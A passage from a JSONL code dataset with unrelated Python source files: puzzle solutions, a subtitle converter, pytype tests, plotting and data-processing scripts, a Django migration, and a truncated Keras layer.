1/2)) = 17/12 ~ 1.466...\n1 + 1/(2 + 1/(2 + 1/(2 + 1/2))) = 41/29 ~ 1.41379...\n\nThe next three expansions are 99/70, 239/169, 577/408, but the eight expansion 1393/985 is the first example where the number of digits in the numerator exceeds the number of digits in the denominator.\n\nIn the first one-thousand expansions, how many fractions contain a numerator with more digits than the denominator?\n\n\"\"\"\n\n# https://oeis.org/A155046\ndef solve(n):\n a, b, c = 1, 1, 0\n for i in range(1, n+1):\n a, b = a + 2*b, a + b\n if len(str(a)) > len(str(b)):\n c += 1\n return c\n\ndef main():\n print(solve(1000))\n\nmain()\n","sub_path":"project_euler/57-square-root-convergents.py","file_name":"57-square-root-convergents.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"647424225","text":"##############################\n# The following tools can be\n# used in the homework\n# assignment posted\n# 10/10/2017.\n##############################\n\ndef isPrime(n):\n \"\"\" Returns boolean indicating if n is a prime number \"\"\"\n \n n = abs(n)\n\n div = 2\n\n if n in [0,1]:\n return False\n\n while div <= n // div:\n if n % div == 0:\n return False\n div += 1\n \n return True\n\ndef read_file_to_string(file):\n \"\"\" Reads a plain text file to a string \"\"\"\n\n with open(file,\"r\") as f:\n s = f.read()\n return s\n","sub_path":"csc280/coursework/1010/utils_hwk_1010.py","file_name":"utils_hwk_1010.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"623610935","text":"# written by deciMae, minorly edited by glumbaron\n\nimport re\nimport sys\nfrom dataclasses import dataclass\nfrom functools import reduce\nfrom pathlib import Path\nfrom typing import Union, Generator, List\n\n\n@dataclass\nclass SrtTimestamp:\n hour: int\n minute: int\n second: int\n millisecond: int\n\n def __repr__(self):\n return (\n f\"{self.hour:02}:{self.minute:02}:\"\n f\"{self.second:02},{self.millisecond:03}\"\n )\n\n\n@dataclass\nclass Section:\n start: SrtTimestamp\n end: SrtTimestamp\n sequence_number: int\n text: str\n\n @property\n def range(self):\n return f\"{self.start} --> {self.end}\"\n\n def __repr__(self):\n return str.join(\"\\n\", [str(self.sequence_number), self.range, self.text])\n\n\ndef parse_chunk(sequence_number: int, text: str, time_delta: int) -> Section:\n time = sequence_number * time_delta\n nexttime = (sequence_number + 1) * time_delta\n hour = time // 3600\n min = time // 60 % 60\n sec = int(time) % 60\n next_hour = nexttime // 3600\n next_min = nexttime // 60 % 60\n next_sec = int(nexttime) % 60\n\n return Section(\n SrtTimestamp(hour, min, sec, 0),\n SrtTimestamp(next_hour, next_min, next_sec, 0),\n sequence_number + 1,\n text,\n )\n\n\ndef split_by_score(text: str, base_width: int = 10, best_length: int = 80) -> List[str]:\n \"\"\"\n Split text by score.\n\n Written by Decimae. I have no idea how this works vOv.\n \"\"\"\n num_chars = len(text)\n scores = [[0, 0] for _ in range(num_chars + 3)]\n for i in reversed(range(num_chars - 2)):\n listmin = i + 1\n listmax = min(int(round(i + best_length + 3 * base_width)), num_chars - 1)\n ideal = i + best_length\n\n for j in range(listmin, min(listmax + 1, num_chars - 1)):\n if text[j] == text[j + 1] and text[j] == \"\\n\":\n listmax = j\n break\n\n scoreopts = [[k, 100] for k in range(listmin, listmax + 1)]\n\n def score(k, preference):\n return preference + ((k - ideal) / base_width) ** 2 + scores[k + 1][1]\n\n for k in range(listmin, listmax + 1):\n if text[k] in \"\\n.!\":\n scoreopts[k - listmin] = [k, score(k, 0.001)]\n elif text[k] == \",;:\":\n scoreopts[k - listmin] = [k, score(k, 1.001)]\n elif text[k] == \" \":\n scoreopts[k - listmin] = [k, score(k, 2.001)]\n\n scores[i] = min(scoreopts, key=lambda pair: pair[1])\n\n out = []\n start = 0\n while scores[start][0] != 0:\n end = scores[start][0] + 1\n chunk = text[start:end].strip()\n start = end\n\n out.append(chunk)\n return out\n\n\ndef convert(src_txt: str, time_delta: int = 5, split_type: str = \"linebreak\") -> str:\n \"\"\"\n Converts a pre-formated text into valid SubRip Text (srt) file format.\n\n Args:\n src_txt: Source text to convert\n time_delta: Optional; Seconds each subtitle section should remain on\n screen. Defaults to 5 seconds.\n split_type: Optional; Defines what is considered a chunk of\n dialogue. Can be one of three options `linebreak`, `emptyline`, `score`.\n\n Returns:\n The converted SRT text.\n \"\"\"\n if split_type == \"linebreak\":\n chunks = (line for line in src_txt.splitlines() if line)\n elif split_type == \"emptyline\":\n chunks = re.split(r\"(?:\\r?\\n){2,}\", src_txt.strip())\n elif split_type == \"score\":\n chunks = split_by_score(src_txt)\n else:\n raise ValueError(f\"Undefined split type: {split_type}\")\n\n sections = (str(parse_chunk(i, text, time_delta)) for i, text in enumerate(chunks))\n\n return str.join(\"\\n\\n\", sections)\n\n\ndef convert_file(src_file: Union[str, Path], output_file: Union[str, Path], **kwargs):\n \"\"\"\n Converts a pre-formated text file into valid SubRip Text (srt) file format.\n\n Args:\n src_file: Path to the input text document.\n output_file: Path to the converted srt file.\n kwargs: See `convert` for available conversion options.\n \"\"\"\n src_txt = Path(src_file).read_text()\n srt_txt = convert(src_txt, **kwargs)\n\n Path(output_file).write_text(srt_txt)\n","sub_path":"txt2srt/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"28483974","text":"import pickle\nfrom numpy import *\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib import animation\nfrom math import factorial\n\ndef savitzky_golay(y, window_size, order, deriv=0, rate=1):\n order_range = range(order+1)\n half_window = (window_size -1) // 2\n b = np.mat([[k**i for i in order_range] for k in range(-half_window, half_window+1)])\n m = np.linalg.pinv(b).A[deriv] * rate**deriv * factorial(deriv)\n firstvals = y[0] - np.abs( y[1:half_window+1][::-1] - y[0] )\n lastvals = y[-1] + np.abs(y[-half_window-1:-1][::-1] - y[-1])\n y = np.concatenate((firstvals, y, lastvals))\n return np.convolve( m[::-1], y, mode='valid')\n\nwith open(\"round_up_rewards.pkl\", 'rb') as fo: \n dict_data = pickle.load(fo, encoding='bytes')\n \nprint(len(dict_data[0]))\n\n\nsmooth_neighbor=1\nstart=len(dict_data[0])-500\nend=len(dict_data[0])\n#end=170000\n\ndict_data0 = savitzky_golay(np.array(dict_data[0][start:end]), smooth_neighbor, 3) \ndict_data1 = savitzky_golay(np.array(dict_data[1][start:end]), smooth_neighbor, 3) \ndict_data2 = savitzky_golay(np.array(dict_data[2][start:end]), smooth_neighbor, 3) \ndict_data3 = savitzky_golay(np.array(dict_data[3][start:end]), smooth_neighbor, 3) \n\n\n\nzz = range(0, end-start)\n\nax1 = plt.subplot(4, 2, 1)\nax2 = plt.subplot(4, 2, 2)\nax3 = plt.subplot(4, 2, 3)\nax4 = plt.subplot(4, 2, 4)\n\nfont2 = {'family': 'Times New Roman',\n 'weight': 'normal',\n 'size': 30,\n }\n\nplt.sca(ax1)\nplt.plot(zz, dict_data0, label='predator-0-reward', linewidth=1,\n color='r', marker='o', markerfacecolor='red', markersize=2)\nplt.xlabel('episodes',font2)\nplt.ylabel('predator-0-reward',font2)\n\nplt.sca(ax2)\nplt.plot(zz, dict_data1, label='predator-1-reward', linewidth=1,\n color='r', marker='o', markerfacecolor='red', markersize=2)\nplt.xlabel('episodes',font2)\nplt.ylabel('predator-1-reward',font2)\n\nplt.sca(ax3)\nplt.plot(zz, dict_data2, label='predator-2-reward', linewidth=1,\n color='r', marker='o', markerfacecolor='red', markersize=2)\nplt.xlabel('episodes',font2)\nplt.ylabel('predator-2-reward',font2)\n\nplt.sca(ax4)\nplt.plot(zz, dict_data3, label='prey-reward', linewidth=1,\n color='b', marker='o', markerfacecolor='blue', markersize=2)\nplt.xlabel('episodes',font2)\nplt.ylabel('prey-reward',font2)\nplt.show()\n","sub_path":"tools/y.py","file_name":"y.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"635075495","text":"def answer(s):\n salutes = 0\n # while('>' in s or '<' in s):\n # print(s)\n # temp_s = [char for char in s]\n # # for i in range(len(s) - 1):\n # # if s[i] == '>' and s[i + 1] == '<':\n # # salutes += 2\n # spots = []\n # for i, char in enumerate(s):\n # if i == 0 and char == '<' or i == len(s) - 1 and char == '>':\n # pass\n # else:\n # if char == '>':\n # if s[i + 1] == '<':\n # salutes += 2\n # temp_s[i + 1] = '>'\n # spots.append(i + 1)\n # if char == '<':\n # temp_s[i - 1] = '<'\n # spots.append(i - 1)\n # for i in range(len(s)):\n # if i not in spots:\n # temp_s[i] = '-'\n # s = ''.join(temp_s)\n # return salutes\n for i, char in enumerate(s):\n if char == '>':\n for j, char2 in enumerate(s[i:len(s)]):\n if char2 == '<':\n salutes += 2\n return salutes\n\nif __name__ == '__main__':\n print(answer(\"<<>><\"))","sub_path":"salute.py","file_name":"salute.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"263462813","text":"\"\"\"Tests for directors.py.\"\"\"\n\n\nfrom pytype import directors\nfrom pytype import errors\nimport unittest\n\n_TEST_FILENAME = \"my_file.py\"\n\n\nclass LineSetTest(unittest.TestCase):\n\n def test_basic_operation(self):\n lines = directors._LineSet()\n lines.add(7)\n self.assertNotIn(6, lines)\n self.assertIn(7, lines)\n self.assertNotIn(8, lines)\n self.assertNotIn(100, lines)\n lines.add(100, open_ended=True)\n self.assertNotIn(99, lines)\n self.assertIn(100, lines)\n self.assertIn(101, lines)\n\n def test_increasing_limit(self):\n lines = directors._LineSet()\n lines.add(100, open_ended=True)\n lines.add(200, open_ended=True)\n self.assertNotIn(99, lines)\n self.assertIn(100, lines)\n self.assertIn(200, lines)\n self.assertIn(201, lines)\n\n def test_decreasing_limit(self):\n lines = directors._LineSet()\n lines.add(200, open_ended=True)\n lines.add(100, open_ended=True)\n self.assertNotIn(99, lines)\n self.assertIn(100, lines)\n self.assertIn(200, lines)\n self.assertIn(201, lines)\n\n\nclass DirectorTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n # Invoking the _error_name decorator will register the name as a valid\n # error name.\n for name in [\"test-error\", \"test-other-error\"]:\n errors._error_name(name)\n\n def _create(self, src, disable=()):\n self._errorlog = errors.ErrorLog()\n self._director = directors.Director(src, self._errorlog, _TEST_FILENAME,\n disable)\n\n def _should_report(self, expected, lineno, error_name=\"test-error\",\n filename=_TEST_FILENAME):\n error = errors.Error.for_test(\n errors.SEVERITY_ERROR, \"message\", error_name, filename=filename,\n lineno=lineno)\n self.assertEquals(\n expected,\n self._director.should_report_error(error))\n\n def test_ignore_globally(self):\n self._create(\"\", [\"my-error\"])\n self._should_report(False, 42, error_name=\"my-error\")\n\n def test_ignore_one_line(self):\n self._create(\"\"\"\n # line 2\n x = 123 # type: ignore\n # line 4\n \"\"\")\n self._should_report(True, 2)\n self._should_report(False, 3)\n self._should_report(True, 4)\n\n def test_ignore_until_end(self):\n self._create(\"\"\"\n # line 2\n # type: ignore\n # line 4\n \"\"\")\n self._should_report(True, 2)\n self._should_report(False, 3)\n self._should_report(False, 4)\n\n def test_out_of_scope(self):\n self._create(\"\"\"\n # type: ignore\n \"\"\")\n self._should_report(False, 2)\n self._should_report(True, 2, filename=None) # No file.\n self._should_report(True, 2, filename=\"some_other_file.py\") # Other file.\n self._should_report(True, None) # No line number.\n\n def test_disable(self):\n self._create(\"\"\"\n # line 2\n x = 123 # pytype: disable=test-error\n # line 4\n \"\"\")\n self._should_report(True, 2)\n self._should_report(False, 3)\n self._should_report(True, 4)\n\n def test_disable_until_end(self):\n self._create(\"\"\"\n # line 2\n # pytype: disable=test-error\n # line 4\n \"\"\")\n self._should_report(True, 2)\n self._should_report(False, 3)\n self._should_report(False, 4)\n\n def test_disable_other_error(self):\n self._create(\"\"\"\n # line 2\n x = 123 # pytype: disable=test-other-error\n # line 4\n \"\"\")\n self._should_report(True, 2)\n self._should_report(True, 3)\n self._should_report(False, 3, error_name=\"test-other-error\")\n self._should_report(True, 4)\n\n def test_disable_multiple_error(self):\n self._create(\"\"\"\n # line 2\n x = 123 # pytype: disable=test-error,test-other-error\n # line 4\n \"\"\")\n self._should_report(True, 2)\n self._should_report(False, 3)\n self._should_report(False, 3, error_name=\"test-other-error\")\n self._should_report(True, 4)\n\n def test_disable_all(self):\n self._create(\"\"\"\n # line 2\n x = 123 # pytype: disable=*\n # line 4\n \"\"\")\n self._should_report(True, 2)\n self._should_report(False, 3)\n self._should_report(True, 4)\n\n def test_invalid_disable(self):\n def check_warning(message_regex, text):\n self._create(text)\n self.assertLessEqual(1, len(self._errorlog))\n error = list(self._errorlog)[0]\n self.assertEquals(_TEST_FILENAME, error._filename)\n self.assertEquals(1, error.lineno)\n self.assertRegexpMatches(str(error), message_regex)\n\n check_warning(\"Unknown pytype directive.*disalbe.*\",\n \"# pytype: disalbe=test-error\")\n check_warning(\"Invalid error name.*bad-error-name.*\",\n \"# pytype: disable=bad-error-name\")\n check_warning(\"Invalid directive syntax\",\n \"# pytype: disable\")\n check_warning(\"Invalid directive syntax\",\n \"# pytype: \")\n check_warning(\"Unknown pytype directive.*foo.*\",\n \"# pytype: disable=test-error foo=bar\")\n # Spaces aren't allowed in the comma-separated value list.\n check_warning(\"Invalid directive syntax\",\n \"# pytype: disable=test-error ,test-other-error\")\n # This will actually result in two warnings: the first because the\n # empty string isn't a valid error name, the second because\n # test-other-error isn't a valid command. We only verify the first\n # warning.\n check_warning(\"Invalid error name\",\n \"# pytype: disable=test-error, test-other-error\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"pytype/directors_test.py","file_name":"directors_test.py","file_ext":"py","file_size_in_byte":5403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"122218382","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Disciplina',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('nome', models.CharField(verbose_name='Nome', max_length=100)),\n ('ementa', models.TextField(verbose_name='Ementa')),\n ('cargaHoraria', models.CharField(verbose_name='Carga Horaria', max_length=20)),\n ('date_joined', models.DateTimeField(verbose_name='Data de Criação', auto_now_add=True)),\n ('date_up_joined', models.DateTimeField(auto_now=True, verbose_name='Data de Atualização: ')),\n ],\n options={\n 'ordering': ['nome'],\n 'verbose_name_plural': 'Disciplinas',\n 'verbose_name': 'Disciplina',\n },\n ),\n ]\n","sub_path":"eforum/disciplina/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"15011520","text":"\"\"\"\nClasses to manage HTML files compare, finding target elements etc.\n\"\"\"\n\n\nclass HtmlElement:\n \"\"\"\n Representation of HTML element. Includes methods to Get element XPath.\n \"\"\"\n\n def __init__(self, soup_obj):\n self.soup_obj = soup_obj\n self.tag_attrs = self.soup_obj.attrs\n self.tag_attrs[\"value\"] = self.soup_obj.string if self.soup_obj.string else \"\"\n\n @staticmethod\n def get_node_element(node):\n \"\"\"\n\n :param node:\n :return:\n \"\"\"\n length = len(list(node.previous_siblings)) + 1\n if length > 1:\n return f'{node.name}:nth-child({length})'\n else:\n return node.name\n\n def get_xpath(self):\n \"\"\"\n\n :return:\n \"\"\"\n path = [self.get_node_element(self.soup_obj)]\n for parent in self.soup_obj.parents:\n if parent.name == 'body':\n break\n path.insert(0, self.get_node_element(parent))\n return ' > '.join(path)\n\n\nclass ElementComparator:\n \"\"\"\n This class created for matching two 'HtmlElement' class'es objects. Methods to compare provided below.\n You can override and add more methods with more logic such as levenstain distance, name with 'compare_'\n if its needed.\n \"\"\"\n\n # This tags can be different but element can be the same. Additional logic can be implement later\n exclude_to_compare = [\"rel\", \"href\", \"onclick\"]\n\n def __init__(self, original_element, inspected_element):\n self.original_element = original_element\n self.inspected_element = inspected_element\n self.same_elements = []\n self.compare_methods = [getattr(self, method) for method in dir(self) if\n method.startswith(\"compare_\") and callable(getattr(self, method))]\n\n def compare(self):\n \"\"\"\n Main method for comparing elements\n :return: return result of comparing true of false.\n \"\"\"\n original_elements_attrs = self.original_element.tag_attrs\n inspected_element_attrs = self.inspected_element.tag_attrs\n for og_tag_attr, og_tag_value in original_elements_attrs.items():\n if og_tag_attr in self.exclude_to_compare:\n continue\n tar_tag_val = inspected_element_attrs.get(og_tag_attr, og_tag_value)\n result = any([method(og_tag_value, tar_tag_val) for method in self.compare_methods])\n self.same_elements.append(result)\n return all(self.same_elements)\n\n @staticmethod\n def compare_exect_equal(og_value, target_value):\n return og_value == target_value\n\n @staticmethod\n def compare_is_substring(og_value, target_value):\n if og_value != target_value and target_value != \"\":\n if isinstance(og_value, list) and isinstance(target_value, list):\n return bool(set(og_value) & set(target_value))\n return (og_value in target_value) or (target_value in og_value)\n","sub_path":"parser_classes.py","file_name":"parser_classes.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"371046145","text":"import pymongo\nimport pandas as pd\nfrom pandas import Series,DataFrame\nimport matplotlib.pyplot as plt\n\n\ndef db2df(sku):\n client = pymongo.MongoClient('localhost', 27017)\n db = client.AMS\n cursor = db[sku].find()\n data = list(cursor)\n df = pd.DataFrame(data)\n df.drop('_id', axis=1, inplace=True)\n df = df[(~df.title.str.contains('Inateck')) & (~df.title.str.contains('Tomons')) & (~df.title.str.contains('Tomtoc'))]\n #df = df[(df.price>0) & (df.review>0) & (df.star>0)]\n return df\n\n\ndef price_hist(df, bins_num):\n price_max = df.price.max() * 1.1\n price_min = df.price.min() * 0.8\n df.price.hist(bins=bins_num)\n plt.xlim((price_min, price_max))\n\n\ndef ams_asins(df, price_low, price_high):\n df_required = df[(df.price > price_low) & (df.price < price_high)]\n lst_required = list(df_required.asin)\n asins = '|'.join(lst_required)\n return asins\n","sub_path":"dev/first_app/ams_planning.py","file_name":"ams_planning.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"477332945","text":"import numpy, os, datetime\nfrom ..extras import ops\nfrom default import ARMCLASS\n\nclass SOUNDING(ARMCLASS):\n \"\"\" Defines a SOUNDING class\n \n This particular class defines a sounding. It uses as input a netcdf file\n that has been detected as a sounding.\n \n \"\"\"\n \n def plot(self, altmax=10000, kind='simple', \n plot_output=False,\n out_dir = '',\n out_name = '',\n out_fmt = 'png',\n autoname = True):\n ''' \n plot a sounding for quick visualization\n \n you can set altmax (in meters) and an output file in out if you want.\n currently `kind` doesn't work, but will eventually support choosing\n between a normal height/temp plot and a skew-t\n \n example:\n S.plot(altmax=3000, out='sample_out.png')\n \n supported output types:\n anything that matplotlib can normally output, such as png, eps, pdf\n '''\n \n import matplotlib.pyplot as plt\n \n # create a mask for the altitude data\n altmask = self.data['alt'] < altmax\n \n # set up the plot\n f = plt.figure(); plt.clf()\n \n # create axes for the temperature and dewpoint plot\n ax = f.add_subplot(121) \n if kind == 'simple':\n ax.plot(self.data['tdry'][altmask], \n self.data['alt'][altmask], \n 'b-', label='Temp')\n ax.plot(self.data['dp'][altmask], \n self.data['alt'][altmask], \n 'r-', label='Dewpoint')\n ax.legend(fontsize='x-small')\n ax.set_ylim(top=altmax)\n ax.grid('on')\n \n ax.set_xlabel('Temperature (C)')\n ax.set_ylabel('Altitude (m)')\n plt.suptitle(self.file_datetime.strftime(\n 'Sounding beginning %B %d %Y %H:%M'))\n \n # create axes for the RH plot\n ax = f.add_subplot(122)\n ax.plot(self.data['rh'][altmask], \n self.data['alt'][altmask], \n 'k-', label='RelH')\n ax.legend(fontsize='x-small')\n ax.grid('on')\n ax.set_yticklabels('')\n ax.set_xlabel('RH (%)')\n \n #plt.show()\n if plot_output:\n if autoname:\n out_str = 'sounding_%Y-%m-%dH%H.' + out_fmt\n out_name = self.file_datetime.strftime(out_str) \n plt.savefig(out_dir + out_name)\n \n #plt.close(f)","sub_path":"pyadapt/datastreams/sounding.py","file_name":"sounding.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"151637199","text":"import os\n\nfrom quicktions import Fraction\n\nfrom musicscore.basic_functions import dToX\nfrom musicscore.musicstream.streamvoice import SimpleFormat\nfrom musicscore.musictree.treescoretimewise import TreeScoreTimewise\nfrom musicxmlunittest import XMLTestCase\n\npath = os.path.abspath(__file__).split('.')[0]\n\n\ndef _generate_simple_format():\n unit = Fraction(1, 2)\n quarter_durations = [x * unit for x in range(1, 8)]\n intervals = list(range(1, 7))\n midis = dToX(intervals, first_element=60)\n output = SimpleFormat(quarter_durations=quarter_durations, midis=midis)\n return output\n\n\nclass Test(XMLTestCase):\n def setUp(self) -> None:\n self.score = TreeScoreTimewise()\n self.sf = _generate_simple_format()\n\n def test_1(self):\n xml_path = path + '_test_1.xml'\n self.sf.to_stream_voice().add_to_score(self.score)\n\n def _change_quarter_duration(chord, factor):\n chord.quarter_duration *= factor\n\n self.sf.change_chords(lambda chord: _change_quarter_duration(chord, 2))\n self.sf.to_stream_voice().add_to_score(self.score, staff_number=2)\n self.score.write(xml_path)\n self.assertCompareFiles(xml_path)\n\n def test_2(self):\n xml_path = path + '_test_2.xml'\n self.sf.to_stream_voice().add_to_score(self.score)\n\n def _change_quarter_duration(chord, factor):\n chord.quarter_duration *= factor\n\n self.sf.change_chords(lambda chord: _change_quarter_duration(chord, 2) if int(\n chord.quarter_duration) != chord.quarter_duration else None)\n self.sf.to_stream_voice().add_to_score(self.score, staff_number=2)\n self.score.write(xml_path)\n self.assertCompareFiles(xml_path)\n","sub_path":"tests/musicstream/simpleformat/test_change_chords.py","file_name":"test_change_chords.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"394482879","text":"# Copyright (c) 2014 Mirantis Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the License);\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an AS IS BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and#\n# limitations under the License.\n\n\n__author__ = 'mirrorcoder'\n\n\nclass VolumeTransfer(object):\n \"\"\" The main class for gathering information for volumes migrationlib\"\"\"\n def __init__(self, volume, instance, image_id, glance_client, obj=None):\n self.id = volume.id if not obj else obj['id']\n self.size = volume.size if not obj else obj['size']\n self.name = volume.display_name if not obj else obj['name']\n self.description = volume.display_description if not obj else obj['description']\n self.volume_type = (None if volume.volume_type == u'None' else volume.volume_type) \\\n if not obj else obj['volume_type']\n self.availability_zone = volume.availability_zone if not obj else obj['availability_zone']\n self.device = volume.attachments[0]['device'] if not obj else obj['device']\n self.host = getattr(instance, 'OS-EXT-SRV-ATTR:host') if not obj else obj['host']\n self.image_id = image_id if not obj else obj['image_id'] \n self.glance_client = glance_client\n if hasattr(volume, 'bootable'):\n self.bootable = (True if volume.bootable == 'true' else False)\n else:\n self.bootable = False\n self.bootable = self.bootable if not obj else obj['bootable']\n\nclass VolumeTransferDirectly(VolumeTransfer):\n def __init__(self, volume, instance, volume_path):\n super(VolumeTransferDirectly, self).__init__(volume, instance)\n self.volume_path = volume_path\n\n def get_volume_path(self):\n return self.volume_path\n\nclass VolumeTransferViaImage(VolumeTransfer):\n\n def __init__(self, volume, instance, image_id, glance_client):\n super(VolumeTransferViaImage, self).__init__(volume, instance)\n self.glance_client = glance_client\n self.image_id = image_id\n self.__info = self.glance_client.images.get(self.image_id)\n self.checksum = self.__info.checksum\n\n def get_info_image(self):\n return self.__info\n\n def get_ref_image(self):\n \"\"\"\n return file-like object which will be using on destination cloud for importing images (aka volumes)\n \"\"\"\n resp = self.glance_client.images.data(self.image_id)._resp\n return resp\n\n def delete(self):\n self.glance_client.images.delete(self.image_id)\n\n def convert_to_dict(self):\n return {\n '_type_class': VolumeTransfer.__name__,\n 'id': self.id,\n 'size': self.size,\n 'name': self.name,\n 'description': self.description,\n 'volume_type': self.volume_type,\n 'availability_zone': self.availability_zone,\n 'device': self.device,\n 'host': self.host,\n 'image_id': self.image_id,\n 'bootable': self.bootable\n }","sub_path":"migrationlib/os/utils/osVolumeTransfer.py","file_name":"osVolumeTransfer.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"83017812","text":"from peewee import CharField, IntegerField, PrimaryKeyField\n\nfrom vegadns.api.models import database, BaseModel\nimport vegadns.api.models.recordtypes\n\n\nclass DefaultRecord(BaseModel):\n default_type = CharField()\n distance = IntegerField(null=True)\n group_owner_id = IntegerField(db_column='group_owner_id', null=True)\n host = CharField()\n port = IntegerField(null=True)\n record_id = PrimaryKeyField(db_column='record_id')\n ttl = IntegerField()\n type = CharField(null=True)\n val = CharField(null=True)\n weight = IntegerField(null=True)\n\n def to_recordtype(self):\n instance = vegadns.api.models.recordtypes.AbstractRecordType.singleton(\n self\n )\n instance.from_model(self)\n return instance\n\n class Meta:\n db_table = 'default_records'\n\n def validate(self):\n recordtype = self.to_recordtype()\n recordtype.validate(default_record=True)\n","sub_path":"vegadns/api/models/default_record.py","file_name":"default_record.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"600027657","text":"import os, pdb, gc\nimport numpy as np\nimport pandas as pd\nfrom Configs import _C as cfg\n\n\ndef make_click_with_ad():\n \"\"\" 拼接点击日志和广告属性,\n 并存储本地, 暂时过滤了测试集的非登入 creative_id 的日志记录\n \"\"\"\n\n save_dir = cfg.features + \"click_all.pkl\"\n if os.path.exists(save_dir):\n print(\"已经存在 click_all.pkl, 直接读取`{}`\\n\".format(save_dir))\n click_all = pd.read_pickle(save_dir)\n return click_all\n\n click_train = pd.read_csv(cfg.train_dir + \"click_log.csv\")\n click_test = pd.read_csv(cfg.test_dir + \"click_log.csv\")\n \n click_train['creative_id']=click_train['creative_id'].astype('int64')\n click_test['creative_id']=click_test['creative_id'].astype('int64')\n\n print(\"过滤测试集未登入训练集 creative_id 记录\\n\")\n click_test = click_test.loc[click_test['creative_id'].isin(click_train['creative_id'].unique())]\n\n ad_train = pd.read_csv(cfg.train_dir + \"ad.csv\")\n ad_train['creative_id'] = ad_train['creative_id'].astype('int64')\n click_log = click_train.merge(ad_train, how=\"left\", on=\"creative_id\")\n # click_log = click_log.sort_values([\"time\"]).reset_index(drop=True)\n click_log[\"type\"] = \"train\"\n\n ad_test = pd.read_csv(cfg.test_dir + \"ad.csv\")\n ad_test['creative_id'] = ad_test['creative_id'].astype('int64')\n click_log_test = click_test.merge(ad_test, how=\"left\", on=\"creative_id\")\n # click_log_test = click_log_test.sort_values([\"time\"]).reset_index(drop=True)\n click_log_test['type'] = \"test\"\n\n click_all = click_log.append(click_log_test)\n click_all.to_pickle(save_dir)\n\n return click_all\n","sub_path":"src/processing/click.py","file_name":"click.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"464372194","text":"import threading\nimport time\n\nrunning = 1\n\nclass MyThread(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.var = 0\n\n def run(self):\n while(running):\n self.var = self.var +1\n time.sleep(1) \n self.var = self.var +1 # Pretend to work for a second\n\n # Four times...\nmythread = MyThread() # ...Instantiate a thread and pass a unique ID to it\nmythread.start() # ...Start the thread\n\n\n# for i in range(10):\n# print(mythread.var)\n# time.sleep(0.5)\n\n# running = 0","sub_path":"Instruments/Lightfield/Python/thread.py","file_name":"thread.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"537220042","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 19 14:39:51 2021\n\n@author: COMPREDICT\n\"\"\"\n\n# +\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tensorflow.keras.layers import Dropout, Layer\nfrom tensorflow.keras.layers import Conv1D, TimeDistributed, Dense\nimport tensorflow as tf\n\nfrom tensorflow import nn\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.keras import constraints\nfrom tensorflow.python.keras import initializers\nfrom tensorflow.python.keras import regularizers\nfrom tensorflow.python.keras.engine.input_spec import InputSpec\n\n\nfrom tensorflow.python.keras.utils import conv_utils\nfrom tensorflow.python.keras.utils import tf_utils\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.util.tf_export import keras_export\n\n\nclass residual_block(Layer):\n \"\"\" Residual Block consisting of:\n DepthwiseConv1D->Dropout->DepthwiseConv1D->Dropout->Residual Connection\n Dilation is constant within residual block.\n\n Input shape:\n 3D Tensor with shape:\n [batch, Tx, n features]\n Output shape:\n 3D Tensor with shape:\n [batch, Tx, n features*depth_multiplier]\n \"\"\"\n def __init__(self, depthwise_kernel_size, dilation_rate=1,\n padding=\"causal\", activation=tf.keras.activations.swish,\n dropout=0.2, depth_multiplier=1,\n 